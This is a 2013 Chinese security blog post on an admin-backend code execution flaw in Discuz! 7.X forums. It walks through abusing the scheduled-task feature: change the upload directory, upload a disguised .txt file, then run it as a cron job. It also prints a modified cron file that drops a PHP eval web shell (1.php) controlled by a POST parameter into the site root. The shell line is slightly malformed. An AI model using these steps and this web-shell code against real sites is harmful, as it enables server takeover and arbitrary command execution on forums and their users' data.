Discuz!7.X后台任意代码执行

20130826095350

由于计划任务功能没有对文件名做任何限制导致只需要把文件上传到/include/crons/目录就可以执行

首先到全局附件设置修改上传目录

20130826095436

然后直接拿他本身存在的计划任务件
/include/crons/announcements_daily.inc.php修改内容为

<?php

/*
    [Discuz!] (C)2001-2009 Comsenz Inc.
    This is NOT a freeware, use is subject to license terms

    $Id: announcements_daily.inc.php 17476 2008-12-25 02:58:18Z liuqiang $
*/

if(!defined('IN_DISCUZ')) {
    exit('Access Denied');
}

fputs(fopen('1.php','w'),'<?php eval($_POST[cmd)?>rn');

?>

我是保存的11.txt,到论坛任意可以上传文件的板块发表新帖上传

20130826095544

 

到后台在附件管理可以获得上传的路径和文件名
20130826095613
我这里显示的是1307312134da261a93f37e3656.txt,记住这个文件名
把他写到计划任务里
20130826095648
提交后点执行1.php就在根目录生成了

作者:vakin

本文固定链接: https://www.unhonker.com/bug/1370.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年08月26日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Discuz!7.X后台任意代码执行 | 90' s Blog|关注网络信息安全
关键字: ,

Discuz!7.X后台任意代码执行:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!